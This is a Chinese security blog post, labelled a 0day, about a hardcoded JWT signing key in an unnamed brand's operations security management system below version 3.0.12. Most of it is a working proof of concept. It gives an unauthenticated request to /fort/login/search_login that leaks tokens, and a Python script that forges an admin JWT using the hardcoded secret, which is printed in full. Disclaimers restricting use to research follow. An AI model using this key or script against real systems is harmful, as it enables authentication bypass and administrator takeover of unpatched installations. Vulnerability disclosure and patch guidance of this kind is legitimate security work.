文章总结： 某知名运维安全管理系统被发现存在Jwt密钥硬编码漏洞，影响低于3.0.12版本。攻击者可利用硬编码密钥伪造Token绕过认证，结合未授权接口接管管理员权限。文档提供了详细POC代码验证漏洞利用过程。建议立即升级系统，修复硬编码缺陷，加强密钥管理以防范未授权访问风险。 综合评分： 86 文章分类： 漏洞POC,漏洞预警,WEB安全

【0day】某知名品牌运维安全管理系统 Jwt 密钥硬编码

0day收割机

2026年3月5日 16:20 山东

漏洞简介

某知名品牌运维安全管理系统存在 Jwt 密钥硬编码漏洞。攻击者可通过分析应用程序代码或通过其他方式获取硬编码的 Jwt 密钥，利用该密钥伪造 Jwt Token，从而绕过身份认证机制，实现未授权访问系统功能或敏感信息，可能导致越权操作、数据泄露等严重后果。

影响版本

低于 3.0.12 20241106

POC

未授权获取actionToken、accessToken

GET /fort/login/search_login HTTP/1.1
Host:

伪造合法的Jwt签名token

伪造一个登录用户名 admin

import jwt
import time

# 从代码中获取的硬编码密钥
SECRET_KEY = "69fad654821b991725e62fb65ee464da"

# 伪造的用户信息
payload = {
    "loginName": "admin",
    "userId": "1000000000001",
    "exp": int(time.time()) + 43200  # 设置一个未来的过期时间
}

# JWT Header
headers = {
  "typ": "JWT",
  "alg": "HS256"
}

# 使用获取的密钥签名，生成伪造的token
forged_token = jwt.encode(payload, SECRET_KEY, algorithm="HS256", headers=headers)

print(forged_token)

仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害，均由使用者自行承担，文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0day收割机 《【0day】某知名品牌运维安全管理系统 Jwt 密钥硬编码》